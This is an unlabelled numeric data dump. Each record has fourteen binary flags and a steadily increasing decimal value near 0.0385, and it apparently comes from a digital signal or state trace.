0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.8519984e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8519988e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520004e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520028e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8520032e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8520052e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8520076e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520084e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520128e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520156e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520204e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520228e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520276e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520304e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520356e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,3.8520380e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8520384e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8520404e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8520428e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520436e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520452e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520476e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8520484e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8520528e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8520556e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.8520560e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520564e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520580e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520604e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520628e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520676e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520700e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520728e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520752e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8520756e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8520804e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8520828e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520836e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520852e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520876e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520900e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520928e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8520952e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8520980e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521004e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521028e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521052e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521076e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521128e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521152e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521180e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521204e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521228e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521276e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521328e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521356e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521404e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521428e-02 0,0,1,0,1,0,0,0,0,1,0,0,0,0,3.8521432e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8521436e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8521476e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8521504e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.8521508e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521512e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521556e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521580e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521628e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521676e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521700e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8521708e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8521728e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8521756e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521760e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521804e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521828e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521876e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521904e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8521956e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8521980e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522028e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522052e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8522060e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8522076e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8522104e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522108e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522128e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522152e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522180e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522204e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8522208e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8522228e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8522252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522260e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522304e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522328e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522380e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522404e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522452e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522476e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8522484e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8522504e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8522528e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.8522532e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522536e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522552e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522580e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522604e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522628e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522652e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522676e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522724e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522776e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522800e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522828e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522852e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522876e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8522900e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522924e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8522932e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8522948e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8522976e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.8522980e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8522984e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523028e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523052e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523124e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523176e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523200e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523276e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8523280e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8523300e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8523324e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523332e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523348e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523376e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8523380e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8523400e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8523428e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.8523432e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523436e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523476e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523500e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523552e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523576e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523628e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523652e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523724e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8523732e-02 0,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8523748e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8523776e-02 0,0,1,0,1,1,0,0,0,0,0,0,0,0,3.8523780e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523784e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523800e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523828e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523852e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523876e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523900e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8523948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8523976e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524000e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524028e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524052e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524076e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524124e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524148e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524176e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524200e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524228e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524276e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524300e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524324e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524348e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524376e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524400e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524428e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524452e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524476e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524500e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524524e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524548e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524576e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524600e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524628e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524652e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524676e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524700e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524724e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524748e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524776e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524800e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524828e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524852e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524876e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524900e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524924e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8524948e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8524976e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8525000e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8525028e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8525052e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8525076e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8525100e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8525124e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8525148e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8525176e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8525200e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8525228e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8525252e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8525276e-02 0,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8525300e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8525324e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8525332e-02 0,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8649172e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8649368e-02 1,0,1,0,1,1,0,0,0,1,0,1,0,1,3.8649396e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8649420e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.8649708e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8649732e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.8649756e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8649780e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.8649804e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8649828e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.8649852e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8649876e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.8649900e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8649928e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,1,3.8649952e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,1,3.8649980e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,3.8649984e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8650004e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650028e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8650052e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650076e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650084e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8650104e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650128e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8650156e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650180e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8650204e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650228e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8650252e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650276e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8650304e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650328e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650332e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8650356e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650380e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8650404e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650428e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,3.8650432e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650436e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8650452e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650476e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8650504e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650528e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8650556e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650580e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8650604e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650628e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650636e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8650652e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650676e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8650704e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650728e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650732e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8650756e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650780e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,3.8650784e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650788e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8650804e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650828e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8650852e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650876e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8650904e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8650928e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8650956e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,3.8650980e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8650984e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8651004e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651028e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651036e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8651052e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651076e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8651104e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651128e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8651156e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,3.8651180e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651184e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8651204e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651228e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8651252e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651276e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8651304e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651328e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,3.8651332e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651336e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8651356e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651380e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8651404e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651428e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8651452e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651476e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651484e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8651504e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651528e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8651556e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651580e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8651604e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651628e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8651652e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651676e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651684e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8651704e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651728e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8651756e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,3.8651780e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651784e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8651804e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8651828e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651836e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8651852e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651876e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8651904e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651928e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8651956e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8651980e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8652004e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652028e-02 1,0,1,0,1,0,0,0,0,1,0,0,0,0,3.8652032e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8652036e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8652052e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8652076e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652084e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8652104e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652128e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8652180e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652204e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8652252e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652276e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8652328e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652356e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8652404e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652428e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8652476e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652504e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8652556e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652580e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8652604e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652628e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8652652e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652676e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8652684e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8652704e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8652728e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8652756e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8652780e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8652804e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8652828e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8652852e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8652876e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8652904e-02 1,0,1,0,1,1,0,0,0,0,0,0,0,0,3.8652932e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652936e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8652956e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8652980e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8653004e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653028e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8653036e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8653056e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8653080e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8653108e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8653132e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8653156e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8653180e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8653204e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8653228e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653236e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8653256e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653280e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8653308e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653332e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8653356e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653380e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.8653404e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653428e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8653436e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8653456e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8653480e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8653508e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8653532e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.8653556e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.8653580e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.8653588e-02 